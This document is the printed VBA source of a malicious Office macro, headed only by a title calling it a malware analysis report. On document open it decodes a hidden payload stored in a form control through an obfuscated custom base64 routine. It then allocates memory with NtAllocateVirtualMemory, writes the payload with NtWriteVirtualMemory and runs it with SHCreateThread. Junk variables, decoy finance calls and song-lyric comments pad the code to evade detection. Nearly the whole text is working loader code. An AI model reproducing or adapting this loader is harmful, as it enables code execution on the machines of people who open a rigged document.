Malicious Office (OLE) — malware analysis report

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Dim gogo As Long
Dim dotterel As Long
perissology = "consistory"
piscidia = "orchestrator"
tyrannize
homogyne = 21
electrocute = 36089
selenipedium = 385492
saprogenous = SLN(selenipedium, electrocute, homogyne)
End Sub
Function admissive(innately, arctocephalus, contemper)
#If Win64 Then
Dim analogical As Byte
Dim collectible As Long
Dim perishable As LongPtr
Dim eclaircissement As LongPtr
Dim chromosphere As LongPtr
Dim erato As Variant
Dim disjunct As LongPtr
Dim ast As LongPtr
#Else
Dim eclaircissement As Long
Dim savannah As String
Dim perishable As Long
Dim stonecress As String
Dim disjunct As Long
Dim bedgown As Variant
Dim chromosphere As Long
Dim lorgnette As Variant
Dim ast As Long
Dim affricate As Variant
Dim cocheleate As String
#End If
misproportion = "facundity"
bloodlessly = Fix(191.4983 + 242)
eclaircissement = innately
ast = contemper
ghyll = misproportion
disjunct = arctocephalus
bittercress = 46
unended = 13249
obnubilated = 365686
scowling = SLN(obnubilated, unended, bittercress)

misproportion = "hosannah"
perishable = 5 + 40 + 45 - 91
moored ByVal perishable, eclaircissement, disjunct, ast, chromosphere
bloodlessly = Fix(125.5467 + 481)
End Function
Sub max()
    With Documents("Example.doc").Windows(1)
        If .WindowState = wdWindowStateMinimize Then _
            .WindowState = wdWindowStateMaximize
    End With
End Sub

Function broadcasting(onehalf)
Dim musket As String
Dim megaphone As Integer
Dim microstomus As Byte
Dim lexicography As Integer
#If Win64 Then
Dim beninese As Integer
Dim barn As LongPtr
involved = 8
Dim sexy As Integer
Dim avionics As LongPtr
Dim houston As Integer
Dim clavated As LongPtr
Dim plastered As Variant
#Else
Dim dejected As String
Dim barn As Long
involved = 4
Dim avionics As Long
Dim capitalization As Long
Dim clavated As Long
Dim understudy As Byte
Dim amitosis As Variant
#End If
cloudtouching = admissive(VarPtr(barn), VarPtr(onehalf) + 8, involved)
bearing = -1
avionics = 0
planner = 28 - 28
clavated = 9728
purulence = 36 + 65 - 33 + 4028
mensal = 95 - 100 + 69
besmear = angelically(ByVal bearing, avionics, ByVal planner, clavated, ByVal purulence, ByVal mensal)
ghyll = ghyll

incoherence = incoherence / 70

admissive avionics, barn, 64 - 32 + 4352
graveolent = 37
hydrometer = 20330
commendat = 269159
overbid = SLN(commendat, hydrometer, graveolent)

broadcasting = avionics
End Function
Sub tyrannize()
Dim butt As Integer
Dim icosahedron As String
overreckon = ThisDocument.ComputeStatistics(wdStatisticPages)
blush.mezzosoprano.Value = overreckon + 9
gorgeousness = "fut" & "uriti" & "on"
haiti = "appropriate"
conditionality = "connoisseur"
Set noninflammatory = blush.mezzosoprano.SelectedItem
speeding = 30
cafuzo = 18427
boringness = 563288
statuelike = SLN(boringness, cafuzo, speeding)

dphil = noninflammatory.Name
astraea = 10 - 70 - 36 + 5940
disscit = Right(dphil, astraea)
adore = fruitage.miasm(disscit)
selfabasement = 78
aitch = 33001
ketembilla = 325861
aitch = Pmt(0.0467, selfabasement, -15062, ketembilla, 0)

beyond = "fulsome"
#If Win64 Then
Dim collectedly As Long
Dim accent As LongPtr
Dim cetraria As LongPtr
Dim hymen As String
#Else
Dim dactylonomy As String
Dim cetraria As Long
Dim exponentially As Byte
Dim accent As Long
#End If
paradox = 0
scorify = "chrom" & "oblastom" & "ycosis"
clashing = 4096
commemorative = 41
acrocarpous = 39217
affranchise = 293146
give = SLN(affranchise, acrocarpous, commemorative)

cephalochordata = "di" & "sco"
lolo = "uppercut"
picketing = "dearth"
microbe = 27
sprit = 16196
reechy = 318826
gallinaceous = SLN(reechy, sprit, microbe)

telegrapher = adore
dissatisfied = "excogitate"
accent = broadcasting(telegrapher)
mix = "monospermous"
#If Win64 Then
Dim doux As Variant
Dim interspersion As LongPtr
intromit = "electrometer"
canticle = "igigi"
Dim lawfulness As LongPtr
acharnement = 13 - 62 - 122 + 1483
#ElseIf Win32 Then
diestock = "ar" & "tists"
unimaginative = "cavaliere"
Dim interspersion As Long
trifle = 4 - 1 + 5 + 487
Dim lawfulness As Long
acharnement = trifle + 2659

#End If
Dim biotite As Variant
Dim toy As Variant
interspersion = 0
cetraria = accent + acharnement
lawfulness = 1
byssus = reflect(cetraria, interspersion, lawfulness, interspersion)
am = 38
birdcage = 31305
crystallized = 256586
mea = SLN(crystallized, birdcage, am)

End Sub



Attribute VB_Name = "fruitage"
' You search for me
' You search for me
' You surprise me with
#If Win64 Then
' You surprise me with just how perfect you are
' You search for me
' I'm suppose to be
Public Declare PtrSafe Function dayspring Lib "Shell32.dll" Alias "SHGetSettings" (dover As LongPtr,moldiness As LongPtr) As LongPtr
' I'm suppose to be
' There's no doubt that this will make me strong
' Despite this cruel world
Public Declare PtrSafe Function hardened Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (inquiring As LongPtr, corps As Any,ghostwriter As LongPtr, garmentmaker As Any) As Boolean
' And when I doubt
' I never want to wake you up
' Even with all my flaws
Public Declare PtrSafe Function moored Lib "Ntdll.dll" Alias "NtWriteVirtualMemory" (ByVal slouching As Any, ByVal interweave As Any, ByVal depopulate As Any, ByVal allknowing As Any, ByVal westerly As Any) As LongPtr
' Out in the world that's beyond my control
' You always seem
' I never want to wake you up
Public Declare PtrSafe Function reflect Lib "Shlwapi.dll" Alias "SHCreateThread" (ByVal anshar As LongPtr, ByVal glower As Any, ByVal allophone As LongPtr, ByVal kike As LongPtr) As LongPtr
' Despite this cruel world
' Because it's the hardest thing I've ever done
'
Public Declare PtrSafe Function sensual Lib "Kernel32.dll" Alias "LocalFree" (boycott As LongPtr) As LongPtr
' There's no doubt that this will make me strong
' Because it's the hardest thing I've ever done
' The stronger one
Public Declare PtrSafe Function angelically Lib "ntdll.dll" Alias "NtAllocateVirtualMemory" (accountable As LongPtr, semiopacous As LongPtr, ByVal badtempered As LongPtr,zoarcesByVal As LongPtr, gittern As LongPtr, ByVal degage As LongPtr) As LongPtr
' You remind me of just how perfect you are
' Just how perfect you are
' And when I'm lost
Public Declare PtrSafe Function dodderer Lib "Shell32.dll" Alias "SHGetDesktopFolder" (fictional As LongPtr)
' And when I doubt
' And when I doubt
' Just how perfect you are
Public Declare PtrSafe Function cirripedia Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal emerald As LongPtr,enslavement As LongPtr,hurst As LongPtr,average As LongPtr,cosmopolitan As LongPtr) As Boolean
' You remind me of just how perfect you are
' Just how perfect you are
' To prove that theory wrong

'
' You're my belief
' You surprise me with
#Else
' And when I'm lost
' You surprise me with
' Just how perfect you are
Public Declare Function preservative Lib "Shell32.dll" Alias "SHGetDesktopFolder" (sedulous As Long)
' I'm suppose to be
' To prove that theory wrong
' There's no doubt that this will make me strong
Public Declare Function epidendron Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal achromatism As Long, layia As Long, unsaturated As Long, fanion As Long, brigandine As Long) As Boolean
' You surprise me with
' You're my belief
' There's no doubt that this will make me strong
Public Declare Function intraspecies Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (absently As Long, anodonta As Any, euphractus As Long, catapult As Any) As Boolean
' Just how perfect you are
' You surprise me with
' Even with all my flaws
Public Declare Function moored Lib "Ntdll.dll" Alias "NtWriteVirtualMemory" (ByVal lionhearted As Any, ByVal bizarre As Any, ByVal armchair As Any, ByVal forcing As Any, ByVal aerobacter As Any) As Long
' Even with all my flaws
' Even with all my flaws
' п»їSometimes I doubt the path I chose
Public Declare Function reflect Lib "Shlwapi.dll" Alias "SHCreateThread" (ByVal misemploy As Long, ByVal furl As Any, ByVal unregistered As Any, ByVal drape As Any) As Long
' Despite this cruel world
' I never want to wake you up
' Despite this cruel world
Public Declare Function drown Lib "Kernel32.dll" Alias "LocalFree" (churning As Long) As Long
' You remind me of just how perfect you are
' Full of cynicism
' Just how perfect you are
Public Declare Function salient Lib "Shell32.dll" Alias "SHGetSettings" (mojave As Long, chance As Long) As Long
'
' And all my best efforts
' Full of cynicism
Public Declare Function angelically Lib "Ntdll.dll" Alias "NtAllocateVirtualMemory" (irongray As Long, cauda As Long, ByVal mismatch As Long, intentionByVal As Long, cosignatory As Long, ByVal archegenesis As Long) As Long
' Despite this cruel world
' Despite this cruel world
' When I'm at my wit's end

' I never want to wake you up
' I never want to wake you up
' The stronger one
#End If
' Just how perfect you are
' You always seem
' And when I'm lost
Sub IterateOpenForms()
    Dim frm As Form
    
    For Each frm In Forms
        'Print the name of the referenced form to the Immediate window
        Debug.Print frm.Name
    Next frm
End Sub

Function miasm(catatonic) As String
Dim censoring As Byte

Dim guncotton As Long
Dim coverage(6965) As Byte
Dim catalogued As String

Dim authorize As Long
hangover = "pericarp"

Dim aoudad As Integer
Dim buttery As Long
Dim scrounge() As Byte
ghyll = hangover

Dim stickiness As String
Dim shopkeeper As Long
Dim frostbound(63) As Long
misproportion = ghyll

Dim cogitation As String

Dim deplore(63) As Long
Dim geophysics(63) As Long
unbeseeming = 25 + 67 + 4004
outstep = 16515072
gobbledygook = 256
Dim onside As Variant

Dim ectstasies As Variant

semibreve = 66 - 3
Dim possible As Integer

austereness = 65280
boykinia = 105 + 114 + 52 + 3761
quarrelsome = 117 + 65419
draconian = 64
hominidae = 258048
forefathers = 262144
cloy = 48 + 11 - 117 + 16711738
fractiously = 255
Dim waggishly As Variant
dromedary = 0
Caption = 5843
Dim remark() As Byte
remark = VBA.StrConv(catatonic, vbFromUnicode)
Dim lekvar As Variant
garnish = 74
airspace = 31132
poetize = 532557
airspace = Pmt(0.0707, garnish, -23975, poetize, 0)

unerringly = 5843
emissary = 114 + 84 - 163
convenance = Log(100) / Log(10) + 14
For gerea = 0 To unerringly
If gerea Mod 2 = 0 Then
remark(gerea) = remark(gerea) + convenance
Else
remark(gerea) = remark(gerea) + convenance - 1
End If
Next gerea
elopidae = 28
jordanella = 31036
eschar = 339853
packinghouse = SLN(eschar, jordanella, elopidae)

aoudad = 0
failed = 0
gum = 43
argonaut = audiometer
For guncotton = 0 To 63
deplore(guncotton) = saffron(guncotton, draconian, 3)
frostbound(guncotton) = saffron(guncotton, unbeseeming, 3)
geophysics(guncotton) = saffron(guncotton, forefathers, 3)
Next guncotton
yodh = 42
libation = 32829
vicinage = 365900
bleaching = SLN(vicinage, libation, yodh)

scrounge = remark
nerita = 4
cheilitis = 19
frailty = 36346
indium = 236459
frailty = Pmt(0.0692, cheilitis, -6148, indium, 0)

doorframe = 125 - 122
ghyll = "duelist"

incoherence = VBA.Math.Round(120.6239 + 179)

overofficious = doorframe + 1
mention = 2
For shopkeeper = 0 To unerringly
banners = scrounge(shopkeeper)
spherule = scrounge(shopkeeper + 2)
authorize = geophysics(argonaut(banners)) _
 + frostbound(argonaut(scrounge(shopkeeper + 1))) + deplore(argonaut(spherule)) + argonaut(scrounge(shopkeeper + doorframe))
guncotton = saffron(authorize, cloy, 2)
coverage(buttery) = saffron(guncotton, quarrelsome, 1)
guncotton = saffron(authorize, austereness, 2)
coverage(buttery + 1) = saffron(guncotton, gobbledygook, 1)
coverage(buttery + mention) = saffron(authorize, fractiously, 2)
buttery = buttery + mention + 1
shopkeeper = shopkeeper + 3
Next
miasm = coverage
End Function

Function ignavus(clammily)
ignavus = AscW(clammily)
End Function
Function saffron(suspension, canaliculate, zincography)
Select Case zincography
Case 1
saffron = suspension \ canaliculate
Case 2
saffron = suspension And canaliculate
Case 3
saffron = suspension * canaliculate
End Select
End Function
Function audiometer()
Dim blankness(255) As Byte
sulfamethazine = 65
Do
blankness(sulfamethazine) = sulfamethazine - 65
sulfamethazine = sulfamethazine + 1
Loop Until sulfamethazine = 91
sulfamethazine = 48
Do
blankness(sulfamethazine) = sulfamethazine + 4
sulfamethazine = sulfamethazine + 1
Loop Until sulfamethazine = 58
sulfamethazine = 97
Do
blankness(sulfamethazine) = sulfamethazine - 71
sulfamethazine = sulfamethazine + 1
Loop Until sulfamethazine = 123
blankness(47) = 63
sulfamethazine = 43
blankness(sulfamethazine) = 62
audiometer = blankness
End Function


Attribute VB_Name = "blush"
Attribute VB_Base = "0{C8A04F59-31F4-472A-B098-9C646B541E7C}{5527B7F7-79B2-492C-840A-AC1EF3D9D879}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False